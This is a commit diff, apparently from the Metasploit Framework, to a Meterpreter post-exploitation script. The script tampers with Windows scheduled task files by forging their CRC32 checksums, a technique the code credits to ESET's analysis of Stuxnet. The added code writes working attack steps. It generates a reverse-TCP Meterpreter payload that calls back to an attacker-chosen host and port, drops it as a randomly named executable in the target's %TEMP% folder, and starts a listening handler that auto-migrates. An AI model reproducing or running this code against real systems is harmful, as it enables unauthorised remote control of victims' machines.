Fix errors with ESET and bwd_table not defined, and add the ability to automatically generate a reverse meterpreter payload.
git-svn-id: file:///home/svn/framework3/trunk@11152 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
c45314bf4e
commit
8abdfe5ff2
|
@ -58,6 +58,8 @@ end
|
|||
"-h" => [ false, "Help menu." ],
|
||||
"-c" => [ true, "Execute the specified command" ],
|
||||
"-u" => [ true, "Upload and execute the specified file" ],
|
||||
"-r" => [ true, "The IP of the system running Metasploit listening for the connect back"],
|
||||
"-p" => [ true, "The port on the remote host where Metasploit is listening"],
|
||||
"-t" => [ true, "Use the specified task name" ]
|
||||
)
|
||||
|
||||
|
@ -67,6 +69,8 @@ def usage
|
|||
raise Rex::Script::Completed
|
||||
end
|
||||
|
||||
rhost = Rex::Socket.source_address
|
||||
rport = 4444
|
||||
taskname = nil
|
||||
cmd = nil
|
||||
upload_fn = nil
|
||||
|
@ -88,14 +92,45 @@ upload_fn = nil
|
|||
when "-h"
|
||||
usage
|
||||
|
||||
when "-r"
|
||||
rhost = val
|
||||
|
||||
when "-p"
|
||||
rport = val.to_i
|
||||
end
|
||||
}
|
||||
|
||||
# Must have at least one of -c or -u
|
||||
if not cmd and not upload_fn
|
||||
print_error("You must specify -c or -u")
|
||||
print_line('')
|
||||
usage
|
||||
print_status("Using default reverse-connect meterpreter payload; -c or -u not specified")
|
||||
|
||||
# Get the exe payload.
|
||||
pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp")
|
||||
pay.datastore['LHOST'] = rhost
|
||||
pay.datastore['LPORT'] = rport
|
||||
raw = pay.generate
|
||||
exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
|
||||
#and placing it on the target in %TEMP%
|
||||
tempdir = client.fs.file.expand_path("%TEMP%")
|
||||
tempexename = Rex::Text.rand_text_alpha(rand(8)+6)
|
||||
cmd = tempdir + "\\" + tempexename + ".exe"
|
||||
print_status("Preparing connect back payload to host #{rhost} and port #{rport} at #{cmd}")
|
||||
fd = client.fs.file.new(cmd, "wb")
|
||||
fd.write(exe)
|
||||
fd.close
|
||||
|
||||
#get handler to be ready
|
||||
handler = client.framework.exploits.create("multi/handler")
|
||||
handler.datastore['PAYLOAD'] = "windows/meterpreter/reverse_tcp"
|
||||
handler.datastore['LHOST'] = rhost
|
||||
handler.datastore['LPORT'] = rport
|
||||
handler.datastore['InitialAutoRunScript'] = "migrate -f"
|
||||
handler.datastore['ExitOnSession'] = false
|
||||
#start a handler to be ready
|
||||
handler.exploit_simple(
|
||||
'Payload' => handler.datastore['PAYLOAD'],
|
||||
'RunAsJob' => true
|
||||
)
|
||||
end
|
||||
|
||||
if cmd
|
||||
|
@ -133,12 +168,21 @@ if upload_fn
|
|||
cmd ||= location
|
||||
end
|
||||
|
||||
def crc32(data)
|
||||
table = Zlib.crc_table
|
||||
crc = 0xffffffff
|
||||
data.unpack('C*').each { |b|
|
||||
crc = table[(crc & 0xff) ^ b] ^ (crc >> 8)
|
||||
}
|
||||
crc
|
||||
end
|
||||
|
||||
#
|
||||
# CRC32 stuff from ESET (presumably reversed from Stuxnet, which was presumably
|
||||
# reversed from Microsoft's code)
|
||||
#
|
||||
bwd_table = [
|
||||
def fix_crc32(data, old_crc)
|
||||
#
|
||||
# CRC32 stuff from ESET (presumably reversed from Stuxnet, which was presumably
|
||||
# reversed from Microsoft's code)
|
||||
#
|
||||
bwd_table = [
|
||||
0x00000000, 0xDB710641, 0x6D930AC3, 0xB6E20C82,
|
||||
0xDB261586, 0x005713C7, 0xB6B51F45, 0x6DC41904,
|
||||
0x6D3D2D4D, 0xB64C2B0C, 0x00AE278E, 0xDBDF21CF,
|
||||
|
@ -203,18 +247,8 @@ bwd_table = [
|
|||
0xD4B55116, 0x0FC45757, 0xB9265BD5, 0x62575D94,
|
||||
0x62AE69DD, 0xB9DF6F9C, 0x0F3D631E, 0xD44C655F,
|
||||
0xB9887C5B, 0x62F97A1A, 0xD41B7698, 0x0F6A70D9
|
||||
]
|
||||
]
|
||||
|
||||
def crc32(data)
|
||||
table = Zlib.crc_table
|
||||
crc = 0xffffffff
|
||||
data.unpack('C*').each { |b|
|
||||
crc = table[(crc & 0xff) ^ b] ^ (crc >> 8)
|
||||
}
|
||||
crc
|
||||
end
|
||||
|
||||
def fix_crc32(data, old_crc)
|
||||
crc = crc32(data[0, data.length - 12])
|
||||
data[-12, 4] = [crc].pack('V')
|
||||
|
||||
|
@ -288,7 +322,7 @@ end
|
|||
#
|
||||
# Record the crc32 for later calculations
|
||||
#
|
||||
old_crc32 = ESET.crc32(content)
|
||||
old_crc32 = crc32(content)
|
||||
print_status("Original CRC32: 0x%x" % old_crc32)
|
||||
|
||||
#
|
||||
|
@ -315,8 +349,8 @@ content = Rex::Text.to_unicode(content)
|
|||
#
|
||||
# Fix it so the CRC matches again
|
||||
#
|
||||
ESET.fix_crc32(content, old_crc32)
|
||||
new_crc32 = ESET.crc32(content)
|
||||
fix_crc32(content, old_crc32)
|
||||
new_crc32 = crc32(content)
|
||||
print_status("Final CRC32: 0x%x" % new_crc32)
|
||||
|
||||
#
|
||||
|
|
Loading…
Reference in New Issue